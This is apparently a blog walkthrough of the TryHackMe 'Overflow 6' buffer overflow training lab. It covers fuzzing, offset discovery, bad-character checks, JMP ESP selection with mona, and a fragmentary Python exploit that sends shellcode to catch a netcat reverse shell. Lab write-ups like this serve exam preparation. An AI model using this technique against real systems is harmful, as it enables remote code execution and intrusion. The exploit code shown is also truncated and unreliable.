TryHackme! — OSCP Buffer Overflow

Dhanishtha Awasthi
5 min readJan 8, 2021


Going through the OSCP prep journey, it has now a days in trend, to solve out Buffer Overflow from TryHackMe! platform. Today I am going to share one of them, so that we may get an insight of basic steps by which easiest level stack buffer overflow can be exploited. Without wasting time, let’s get started.

STEP 1: Login into Tryhackme portal and go to dashboard for buffer overflow.

Login and reach to dashboard for module : Buffer Overflow Prep

STEP 2: We will do Overflow 6

STEP3 : Deploy the VM

Now RDP into the machine using the same command as given above

select HOME network when asked for

Now go to Vulnerable app folder → Oscp and run the OSCP exe as administrator.

It says it runs on port 1337


STEP1: Spiking

First we will see what and how the input goes in. To do this, we will connect to IP and Port 1337.

Since we are exploiting OVERFLOW6 , we will use OVERFLOW6 to see what input goes and what output we get.

We see any input goes as OVERFLOW6 <variables>, so we will now fuzz

STEP 2: Fuzzing

To fuzz, run oscp.exe as administrator on target machine. Then on kali make, a python script that sends in input in loop, increasing length each time, to see where is actually crashes

We see our program oscp.exe crashes at 1100 bytes nearly.

STEP 3: Finding Offset

Run oscp.exe and immunity debugger as administrator on target machine. Then attach oscp.exe process to immunity debugger and hit run

attach oscp.exe and press run
running is seen in bottom right corner

Create an offset pattern for 1100 bytes. For this we will use metasploit-framework tool, pattern_create

We will use this in offset finding python script

Create script

Offset is the same value generated by our metasploit-framework pattern create ruby script

run the same script

on target machine’s immunity debugger

paused is seen in bottom right corner. Also the pattern we created is seen in registers, with EIP reflecting at 35694234

EIP : 35694234

We will use metasploit-framework’s pattern_offset.rb script again to get exact match of EIP and thus determining correct offset

we see exact match is at 1034

STEP 4: Overwriting EIP

Run the Immunity debugger and oscp.exe again as administrator, attach the process to immunity and run it, as done previously

On kali, create This will overwrite EIP with B’s and rest all with A’s.

Now run the script and notice on immunity debugger

we see EIP is overwritten with B (hex x42)

STEP 5: Finding bad characters

Run the Immunity Debugger and oscp.exe as administrator and attach the process to debugger, then run it as done previously.

On kali, create script, with all hex values for ascii ranging from x00 to xff are passed, to see if any creates issue.

Now run the script and observer on immunity debugger

nothing different happens on ESP and EIP.

Follow ESP in dump to see effect of badchars. For this right click on ESP and select Follow in DUMP,

Bad chars found : \x00\x08\x2c\xad . remember badchars may effect the one place before and after them. to be sure you remove these badchars from script, and do the whole above process again. If there is no character missing apart from the one’s which we have removed from our script, then there is no more bad char.

STEP 7: Finding right module

To find the right module we will use mona module in immunity debugger, which is pre installed in the target machine.

For this first run oscp.exe and immunity debugger as administrator again, also attach the process to debugger and run it.

typing !mona modules in left botton corner, shows the presence of all modules identified by mona.

Now we will use nasm_shell to get code for JMP ESP

JMP ESP is FF E4 in hex

Now on target machine, using mona modules find, which modules have JMP ESP in them , with least anti BOF vectors set to TRUE.

we see we have atleast 6 different addresses in essfunc.dll , with JMP ESP

Now go to that address

We see we have JMP ESP in this address

Now press F2 to set a breakpoint on this address

STEP 8 : Hitting breakpoint

On target machine, set breakpoint on JMP ESP address. On kali make script

run the script and observe on immunity

breakpoint gets a hit and program is paused.

STEP 8: developing a shellcode

on target machine, run oscp.exe as admin. On kali, make shellcode.

import sys,socket
from time import sleep
payload = ("\xba\xcb\xbe\xb2\x9c\xda\xd9\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
shellcode = "A" * 1034 + "\xaf\x11\x50\x62" + "\x90"*16 + payload +"\r\n"try:
s.send(("OVERFLOW6 "+ shellcode))

print "Error Connecting to server"

STEP 9: Getting the shell.

Now start netcat at port 80 on kali and run

We have successfully got reverse shell on our machine.